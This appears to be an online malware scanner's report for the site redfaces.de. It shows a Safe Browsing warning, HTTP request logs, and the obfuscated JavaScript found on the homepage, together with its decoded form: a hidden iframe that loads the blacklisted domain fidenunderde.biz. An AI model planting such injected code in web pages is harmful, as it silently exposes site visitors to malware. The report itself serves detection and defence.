Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=redfaces.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://redfaces.de/ | 200 OK Content-Length: 2112 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fidenunderde.biz function v51782a4114bf9(v51782a4114c37){ return(parseInt(v51782a4114c37,16));}function v51782a4114d09(v51782a4114d50){ function v51782a4114dff () {var v51782a4114e3c=2; return v51782a4114e3c;} var v51782a4114d8b='';for(v51782a4114dc6=0; v51782a4114dc6<v51782a4114d50.length; v51782a4114dc6+=v51782a4114dff()){ v51782a4114d8b+=(String.fromCharCode(v51782a4114bf9(v51782a4114d50.substr(v51782a4114dc6, v51782a4114dff()))));}return v51782a4114d8b;} document.write(v51782a4114d09('3C696672616D65206E616D653D273627207372633D27687474703A2F2F666964656E756E64657264652E62697A272077696474683D3532206865696768743D343432207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='6' src='http://fidenunderde.biz' width=52 height=442 style='display:none'></iframe> | ||
http://redfaces.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: redfaces.de
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=60
Connection: close
Date: Tue, 23 Dec 2014 22:46:08 GMT
Accept-Ranges: bytes
ETag: "30c600e-840-508ab53ce1d80"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2112
Content-Type: text/html
Expires: Tue, 23 Dec 2014 22:47:08 GMT
Last-Modified: Tue, 25 Nov 2014 09:13:42 GMT
...2112 bytes of data.
GET / HTTP/1.1
Host: redfaces.de
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=60
Connection: close
Date: Tue, 23 Dec 2014 22:46:08 GMT
Accept-Ranges: bytes
ETag: "30c600e-840-508ab53ce1d80"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2112
Content-Type: text/html
Expires: Tue, 23 Dec 2014 22:47:08 GMT
Last-Modified: Tue, 25 Nov 2014 09:13:42 GMT
...2112 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: redfaces.de
Referer: http://www.google.com/search?q=redfaces.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: redfaces.de
Referer: http://www.google.com/search?q=redfaces.de
Result:
The result is similar to the first query. There are no suspicious redirects found.